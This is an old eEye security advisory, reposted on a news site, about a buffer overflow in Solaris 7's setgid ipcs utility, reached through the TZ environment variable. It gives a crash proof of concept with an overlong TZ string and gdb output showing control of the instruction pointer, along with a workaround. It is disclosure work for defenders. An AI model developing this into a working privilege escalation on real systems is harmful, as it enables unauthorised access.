Solaris ipcs vulnerability

By ServerWatch Staff (Send Email)
Posted Apr 13, 2001


Date:         Thu, 12 Apr 2001 18:07:08 -0700
From: Marc Maiffret <marc@EEYE.COM>
Subject:      Solaris ipcs vulnerability
We have discovered a buffer overflow in the /usr/bin/i86/ipcs utility provided with Solaris 7. The problem exists in the parsing of the TZ (TIMEZONE) environment variable. By exploiting this vulnerability an attacker can achieve local sys group privileges.

Solaris ipcs vulnerability

Release Date:
April 11, 2001

Systems Affected:
Solaris 7 (x86)
Other versions of Solaris are most likely affected also.

Discovered by:
Riley Hassell riley@eeye.com

Description:
We have discovered a buffer overflow in the /usr/bin/i86/ipcs utility provided with Solaris 7. The problem exists in the parsing of the TZ (TIMEZONE) environment variable. By exploiting this vulnerability an attacker can achieve local sys group privileges. IPCS is used for gathering information on active inter-process communication facilities. Exploitation of this vulnerability would be very difficult, but not impossible.

bash-2.03$ TZ='perl -e 'print "A"x1035''
bash-2.03$ /usr/bin/i86/ipcs
IPC status from as of Wed Apr 11 17:18:59 [buffer] 2001
Message Queue facility inactive.
T ID KEY MODE OWNER GROUP
Shared Memory:
m 0 0x500004d3 --rw-r--r-- root root
Semaphore facility inactive.
Segmentation Fault (core dumped)

Note: [buffer] is any 1036 (or so) character string. A's...

bash-2.03$ su root
Password:
# gdb /usr/bin/i86/ipcs core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
<snip>
#0 0x41414141 in ?? ()
(gdb) info reg eip
eip 0x41414141 0x41414141
(gdb)

Vendor Status:
Sun Microsystems has been contacted. They are currently working on patches for this and other related vulnerabilities eEye has discovered.

Workaround:
chmod -s /usr/bin/i86/ipcs
This will remove the setgid bit from /usr/bin/i86/ipcs, therefore if someone does exploit this vulnerability, they won?t gain higher privileges.

Greetings:
ADM, Ryan "shellcode ninja" Permeh, KAM, Lamagra, Zen-Parse, Loki, and last but not least- Speakeasy.net

Copyright (c) 1998-2001 eEye Digital Security Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please e-mail alert@eEye.com for permission.

Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.

Feedback
Please send suggestions, updates, and comments to:

eEye Digital Security
http://www.eEye.com
info@eEye.com

Page 1 of 1


Comment and Contribute

Your name/nickname

Your email

(Maximum characters: 1200). You have characters left.